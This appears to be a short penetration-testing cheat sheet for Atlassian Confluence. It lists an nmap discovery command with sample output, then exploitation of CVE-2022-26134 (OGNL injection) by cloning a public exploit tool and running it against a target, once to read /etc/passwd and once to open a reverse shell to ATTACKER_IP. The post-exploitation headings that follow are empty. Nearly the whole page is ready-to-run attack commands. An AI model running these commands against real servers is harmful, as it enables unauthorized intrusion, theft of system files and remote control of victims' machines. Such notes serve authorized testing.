Atlassian Confluence
Discovery
nmap -sC -sV TARGET -p 8090,8091
# 8090/tcp open http Apache Tomcat
# http-title: Log In - Confluence
# 8091/tcp open http Server: Aleph/0.4.6http://TARGET:8090/login.action
http://TARGET:8090/index.actionCVE-2022-26134 - OGNL Injection
git clone https://github.com/jbaines-r7/through_the_wire
cd through_the_wirepython3 through_the_wire.py --rhost TARGET --rport 8090 --lhost ATTACKER_IP --protocol http:// --read-file /etc/passwdpython3 through_the_wire.py --rhost TARGET --rport 8090 --lhost ATTACKER_IP --protocol http:// --reverse-shellPost Exploitation
Interesting Files
Last updated